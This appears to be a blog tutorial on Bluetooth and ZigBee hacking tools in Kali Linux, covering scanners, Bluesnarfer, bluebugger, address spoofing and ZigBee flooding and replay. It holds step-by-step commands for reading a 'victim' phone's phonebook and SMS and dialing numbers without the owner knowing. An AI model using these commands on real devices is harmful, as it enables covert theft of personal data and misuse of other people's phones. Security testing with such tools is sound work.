Penetration TestingWireless Pentest

How To Hack Bluetooth And Other Wireless Tools Using Kali Linux

Blooover is performing the Bluebug attack. When you intend to install the application, you should be using a phone that has the Java Bluetooth API implemented.


  • Reading phonebooks
  • Writing phonebook entries
  • Reading/decoding SMS stored on the device
  • Setting call forward
  • Initiating phone call

How To Hack Bluetooth And Other Wireless Tools Using Kali Linux


Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

Use the below command to see the nearby Bluetooth device details in the log file named btdevices.log

bluelog -i hci0 -o /root/Desktop/btdevices.log –v

This command provides Additional information including information on the manufacturer, broadcast names, and device class.

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log –v

Also Read: (Kali Linux Tutorial) How To Hack Phones With Bluetooth!

BlueMaho: Bluetooth Hacker App

BlueMaho is a GUI-shell (interface) for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written on python, and uses wxPyhon. It can be used for testing BT devices for known vulnerabilities and a major thing to do – testing to find unknown vulns. Also, it can form nice statistics.

BlueMaho, an integrated Bluetooth scanning/hacking tool. Here we will simply use it for scanning. You can start BlueMaho’s elegant GUI by typing:

When you do, it opens a GUI. Here, I have clicked on the “get SDP info” and hit the play button to the left. BlueMaho begins scanning for discoverable devices, and like the other tools, it finds two Bluetooth devices.

In the bottom window, BlueMaho displays more info from the scanned devices. I have copied that info and placed it into a text file to make it easier for you to read.

Note that it displays the name of the first device and then describes the device type as “Audio/Video, Headset profile.” Then identify the second device and we are told its device type is “Phone, Smartphone.”

Now, that we know how to gather information on the Bluetooth devices in our range,


BlueRanger is a simple Bash script that uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long-range location detection. Switch to a Class 3 adapter for more precise short-range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion.

Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):

[email protected]:~# hci1 20:C9:D0:43:4B:D8Bluesnarfer

Bluesnarfer downloads the phonebook of any mobile device vulnerable to Bluesnarfing. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data

Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):

[email protected]:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Mobile Bluetooth Using Bluesnarfer

Check The Configuration.

hciconfig hci0 up

Good, hci0 is up and ready to work!

Scan for victims.

hcitool scan

Ping the victim device to see if the device is awake.

l2ping < Victim MAC Addr>

Browse the victim for rfcomm channels to connect to.

sdptool browse --tree --l2cap < mac addr >

Then you can use bluesnarfer for example to read the victim’s phonebook, dial a number or read Sms or other things.

Bluesnarfer -r 1-100 -C 7 -b < mac addr >

To see available options to do.

bluebugger -h

Dial number.

bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >

Btscanner: Hack Bluetooth In Kali Linux

Btscanner tool can capture information from a Bluetooth device without pairing. You can download Btscanner using this Link. The setup is very small in size (only 1.05 MB) and easy to install. Btscanner searches devices and shows them on the screen and if you want to see more info just hit enter and it will show the device’s mac address.

1. Start your Bluetooth with that command.

Syntax:-service bluetooth start

2. Now open the btscanner with this command.

Syntax:- btscanner

Now you are here.

3. Now see the instructions which are given below in my case press i . and your scan is started.

4. Now you find the Bluetooth device list.

5. Now select with the arrow keys and press enter and get full info about the Bluetooth.


RedFang is a small proof-of-concept application to find non-discoverable Bluetooth devices. This is done by brute-forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().

Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):

[email protected]:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning Bluetooth device information. Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Addresses. Cloning this information effectively allows Bluetooth devices to hide in plain sight. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address).

Well normally most of us never intend to audit the Bluetooth stack in any organization. But this tool could be interesting to use in an environment where Bluetooth devices have been paired with important hardware.

Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):

[email protected]:~# spooftooph -i hci1 -a 00803789EE76

Other Wireless Tools

Transmit a flood of associate requests to a target network.

zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float]

zbassocflood -p 0xBAAD -c 11 -s 0.1


Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files.

zbdsniff: Decode plaintext key ZigBee delivery from a capture file. Will process libpcap or Daintree SNA capture files.

zbdsniff [capturefiles …]


A tcpdump-like tool for ZigBee/IEEE 802.15.4 networks.

zbdump - a tcpdump-like tool for ZigBee/IEEE 802.15.4 networks Compatible with Wireshark 1.1.2 and later.

zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind provides a GTK-based GUI to the user which displays the results of a zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for a response, adding the response to a table as well as displaying signal strength on a gauge widget.


Search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet

zbgoodfind – search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet:

zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d genenerate binary file (test mode)]


Replay ZigBee/802.15.4 network traffic from libpcap or Daintree files

zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files:

zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button